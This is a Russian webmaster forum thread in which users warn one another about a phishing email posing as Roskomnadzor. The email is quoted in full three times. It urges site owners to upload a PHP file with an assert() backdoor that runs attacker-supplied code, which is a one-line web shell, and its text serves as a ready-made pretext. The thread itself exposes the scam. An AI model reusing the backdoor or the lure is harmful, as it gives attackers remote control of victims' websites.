Перейти к содержимому

MOAB

- - - - -

Осторожно развод! Письмо якобы от Роскомнадзора.

роскомнадзор развод

  • Войдите, чтобы ответить
Сообщений в теме: 8

#1 dikiyalex

dikiyalex

    Продвинутый чайник

  • Старая гвардия
  • PipPipPipPip
  • 895 сообщений
672
  • ИзСтали

Отправлено 27 Август 2015 - 09:12

Приходит письмо следующего содержания:

Цитата

Здравствуйте.
Вы получили данное уведомление от Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором доменного имени nam-kazhetsya-chto-ty-loshara.ru в сети «Интернет».В соответствии с Федеральным законом от 5 мая 2014 года № 97-ФЗ "О внесении изменений в Федеральный закон "Об информации, информационных технологиях и о защите информации" и на основании решения суда (Новокуйбышевский городской суд Самарской области) от 11.08.2015 No 2­1618/2015, Ваш сайт nam-kazhetsya-chto-ty-loshara.ru был внесен в реестр организаторов распространения информации в сети «Интернет» и сайтов и (или) страниц сайтов в сети «Интернет», на которых размещается общедоступная информация и доступ к которым в течении суток составляет более трех тысяч пользователей сети «Интернет».


Для идентификации Вас, как администратора доменного имени nam-kazhetsya-chto-ty-loshara.ru, Вам необходимо:1. Cоздать в корневой директории Вашего сайта папку reestr
2. Cоздать в данной папке файл reestr-id128032.php, содержащий следующий текст:

< ?php
/*Подтверждение доменного имени
nam-kazhetsya-chto-ty-loshara.ru*/
assert(stripslashes($_REQUEST[roskomnadzor]));
?>

*В < ?php необходимо убрать пробел между < и ?php
Путь до файла на Вашем сайте должен получиться следующий: remotec.ru/reestr/reestr-id128032.php



Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени nam-kazhetsya-chto-ty-loshara.ru, следую инструкции указанной выше, то Ваш сайт nam-kazhetsya-chto-ty-loshara.ru будет внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации.-------------------
С уважением,
ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ СВЯЗИ, ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ И МАССОВЫХ КОММУНИКАЦИЙ.

Это развод, будьте внимательны.
В функции assert вместо переменной roskomnadzor может быть использовано что угодно и поверьте, на пользу вам это не пойдёт.

#2 Уоки-Токи

Уоки-Токи

    .

  • S.E.Syndicate
  • PipPipPipPipPip
  • 2 189 сообщений
3 847

Отправлено 27 Август 2015 - 09:36

http://habrahabr.ru/post/265515/

Цитата

Сегодня моя хорошая знакомая прислала мне письмо в котором было написано, что её сайт с относительно небольшой посещаемостью внесен в этот реестр.


Текст письма ниже, орфография и пунктуация сохранены.

Здравствуйте.

Вы получили данное уведомление от Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором доменного имени <a href="http://www.yandex.ru">www.yandex.ru в сети «Интернет».

В соответствии с Федеральным законом от 5 мая 2014 года № 97-ФЗ «О внесении изменений в Федеральный закон „Об информации, информационных технологиях и о защите информации“ и на основании решения суда (Новокуйбышевский городской суд Самарской области) от 11.08.2015 No 2­1618/2015, Ваш сайтwww.yandex.ru был внесен в реестр организаторов распространения информации в сети «Интернет» и сайтов и (или) страниц сайтов в сети «Интернет», на которых размещается общедоступная информация и доступ к которым в течении суток составляет более трех тысяч пользователей сети «Интернет».

Для идентификации Вас, как администратора доменного имени www.yandex.ru, Вам необходимо:

1. Cоздать в корневой директории Вашего сайта папку reestr
2. Cоздать в данной папке файл reestr-id198617.php, содержащий следующий текст:

< ?php
/*Подтверждение доменного имени www.yandex.ru*/
assert(stripslashes($_REQUEST[roskomnadzor]));
?>

*В < ?php необходимо убрать пробел между < и ?php
Путь до файла на Вашем сайте должен получиться следующий: www.yandex.ru/reestr/reestr-id128032.php

Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени www.yandex.ru, следую инструкции указанной выше, то Ваш сайт www.yandex.ru будет внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации.

— С уважением,
ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ СВЯЗИ, ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ И МАССОВЫХ КОММУНИКАЦИЙ.



Уверен, что многим стало ясно, что это развод, однако мошенники сделали все, чтобы не сильно продвинутые пользователи выполнили действия по инструкции: письмо пришло с адреса zapret-info@roskomnadzor.org, поэтому неграмотный пользователь может подумать, что ему действительно написали из этой организации. При переходе на адрес roskomnadzor.org пользователя перекидывает на rkn.gov.ru что создает иллюзию реального сайта и домена. Домен roskomnadzor.org был зарегистрирован 6 дней назад.

Изображение

Много действий от пользователя не нужно: создайте директорию, файл, напишите в этом файле одну строку.

Развод заключается в том, что пользователю предлагают создать файл с на первый взгляд безобидным php кодом. Однако, если посмотреть описание функции assert, то сразу станет ясно, что злоумышленники просто выполнят код, который будет указан в переменной roskomnadzor.


#3 donc

donc

    Гай Юлий Калигула Сковородкер

  • Основатель
  • PipPipPipPipPip
  • 9 857 сообщений
8 666
  • Изсекты свидетелей Кецалькоатля

Отправлено 27 Август 2015 - 11:07

Тоже клиент получил. Поржал.

dikiyalex, А кто там у нас в мета заголовках письма истинный отправитель, вот что интересно. Мне его переслали, я не увижу..


Цитата

От: Роскомнадзор <zapret-info@roskomnadzor.org>
Дата: четверг, 27 августа 2015 г.
Тема: Уведомление о внесении сайта вашсайт.ru в реестр организаторов распространения информации в сети «Интернет»
Кому: shop@вашсайт.ru


Здравствуйте.

Вы получили данное уведомление от Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором доменного имени вашсайт.ru в сети «Интернет».
В соответствии с Федеральным законом от 5 мая 2014 года № 97-ФЗ "О внесении изменений в Федеральный закон "Об информации, информационных технологиях и о защите информации" и на основании решения суда (Новокуйбышевский городской суд Самарской области) от 11.08.2015 No 2­1618/2015, Ваш сайт вашсайт.ru был внесен в реестр организаторов распространения информации в сети «Интернет» и сайтов и (или) страниц сайтов в сети «Интернет», на которых размещается общедоступная информация и доступ к которым в течении суток составляет более трех тысяч пользователей сети «Интернет».

Для идентификации Вас, как администратора доменного имени вашсайт.ru, Вам необходимо:
1. Cоздать в корневой директории Вашего сайта папку reestr
2. Cоздать в данной папке файл reestr-id128032.php, содержащий следующий текст:

< ?php
/*Подтверждение доменного имени вашсайт.ru*/
assert(stripslashes($_REQUEST[roskomnadzor]));
?>

*В < ?php необходимо убрать пробел между < и ?php
Путь до файла на Вашем сайте должен получиться следующий: вашсайт.ru/reestr/reestr-id128032.php

Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени вашсайт.ru, следую инструкции указанной выше, то Ваш сайт вашсайт.ru будет внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации.
-------------------
С уважением,
ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ СВЯЗИ, ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ И МАССОВЫХ КОММУНИКАЦИЙ.


#4 KaSH

KaSH

    Инструктор по счастью

  • Основатель
  • PipPipPipPip
  • 1 316 сообщений
2 342
  • Изморя и с гор

Отправлено 27 Август 2015 - 14:01

Замечательный подход. Нам не хочется ломать ваши сайты. Поэтому, пожалуйста, просто дайте нам "ключи от квартиры".
Серьезные сайты размещаю на VPS, простые в SprintHost и в TimeWeb. Старые, более ненужные мне сайты я продаю на Телдери. Бухгалтерию и отчеты в налоговую за меня делает Эльба.

#5 donc

donc

    Гай Юлий Калигула Сковородкер

  • Основатель
  • PipPipPipPipPip
  • 9 857 сообщений
8 666
  • Изсекты свидетелей Кецалькоатля

Отправлено 27 Август 2015 - 14:17

Причем я уверен, что куча народу повелось. На серче темы намекают.

#6 dikiyalex

dikiyalex

    Продвинутый чайник

  • Старая гвардия
  • PipPipPipPip
  • 895 сообщений
672
  • ИзСтали

TC Отправлено 27 Август 2015 - 15:31

У меня с того же мейла, что и на хабре, zapret-info@roskomnadzor.org. Домену roskomnadzor.org неделя, с него стоит редирект на оф. сайт Роскомнадзора, так что тут всё на поверхности.

#7 Drakon

Drakon

    Балбес

  • Основатель
  • PipPipPipPipPip
  • 1 989 сообщений
1 535
  • Изmsk

Отправлено 27 Август 2015 - 19:22

а практически все взломы - направлены не на код, не на ОСь . не на железо тем паче .. а на прокладку меж сидением и клавой!! - и вполне успешно работали и работают и будут работать!! - люди так уж устроены .. ( что уж говорить, если сами кровное в МММ несли ) - так подход " сами отдайте ключи от квартиры, где деньги лежат " - всегда работал лучше всего )))) :D
недорогие и надежные vds - инструмент поднятия ТИЦ
монетизация с ссылок: тут и тут
...
успевает тот, кто не спешит (с)

#8 Spinne

Spinne

    Зануда™

  • Основатель
  • PipPipPipPipPip
  • 2 011 сообщений
3 446
  • Излесу, вестимо

Отправлено 27 Август 2015 - 19:31

Ну что тут скажешь... На удивление простой развод лохов :) Интересно, сколько их попалось на этот трюк?

Можно еще сочинить письмо от имени РАО с требованием предоставить логин-пароль FTP-аккаунта для проверки копирайтов :D
Ник не менял, подпись поменяю позже. Ваш Зануда. Он же AHP-net, но это уже там

#9 AdisPrint

AdisPrint

    Почетный

  • Активный участник
  • PipPipPipPipPip
  • 2 796 сообщений
2 085

Отправлено 27 Август 2015 - 22:06

Это вечно.
http://www.youtube.c...h?v=KKwFxhhIvhM
СНПЧ, чернила, картриджи, фотобумага для принтеров и МФУ - AdisPrint.ru




Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных



© 2020 SMO&SEO форум «WEBIMHO» — продвижение и создание сайтов, интернет-маркетинг

По вопросам рекламы на форуме и цены на рекламу
Все материалы SEO форума разрешены к копированию только с установкой гиперактивной ссылки на webimho.ru,
тем, кто этого не сделает, мы оторвем руки и ноги и поменяем местами,
а когда выйдем из тюрьмы, опять оторвем и опять поменяем.


Россия, г. Москва
  • Top.Mail.Ru

Мы в соцсетях: twitter | вконтакте | facebook | livejournal